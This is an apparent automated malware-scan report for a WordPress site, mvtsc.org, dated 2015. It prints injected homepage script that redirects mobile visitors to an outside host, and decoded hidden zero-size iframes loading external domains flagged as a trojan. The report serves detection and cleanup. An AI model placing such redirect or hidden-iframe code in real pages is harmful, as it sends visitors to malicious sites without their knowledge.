New scan:

Malware Scanner report for mvtsc.org

Malicious/Suspicious/Total urls checked
1/0/12
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://mvtsc.org/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 07 Mar 2015 07:49:15 GMT
Location: http://www.mvtsc.org/
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.mvtsc.org/xmlrpc.php
X-Powered-By: PHP/5.4.37
clean
http://www.mvtsc.org/
200 OK
Content-Length: 20732
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){
window.location = "http://go.unilead.net/SH20k";
}

Decoded script:


<iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe>

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.btdnqa

Hidden iFrame found.
size: 0x0     
src: http://yadito.ru/?1625

<iframe src="http://yadito.ru/?1625" width="0" height="0" align="left">

http://www.mvtsc.org/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 95807
Content-Type: application/javascript
clean
http://www.mvtsc.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://www.mvtsc.org/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.1.4&ver=4.1.1
200 OK
Content-Length: 77389
Content-Type: application/javascript
clean
http://www.mvtsc.org/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.1.4&ver=4.1.1
200 OK
Content-Length: 81219
Content-Type: application/javascript
clean
http://www.mvtsc.org/wp-content/themes/mh-magazine-lite/js/scripts.js?ver=4.1.1
200 OK
Content-Length: 47717
Content-Type: application/javascript
clean
http://clickunderad.com/pop-10290-1.js
410 Gone
Content-Length: 391
Content-Type: text/html
clean
http://clickunderad.com/test404page.js
410 Gone
Content-Length: 391
Content-Type: text/html
clean
http://activepr.ru/js/bodyclick.php?id=11762
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://www.mvtsc.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20
200 OK
Content-Length: 15248
Content-Type: application/javascript
clean
http://www.mvtsc.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.1
200 OK
Content-Length: 9658
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mvtsc.org

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 07 Mar 2015 07:49:15 GMT
Location: http://www.mvtsc.org/
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.mvtsc.org/xmlrpc.php
X-Powered-By: PHP/5.4.37

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mvtsc.org
Referer: http://www.google.com/search?q=mvtsc.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mvtsc.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mvtsc.org/

Result: mvtsc.org is not infected or malware details are not published yet.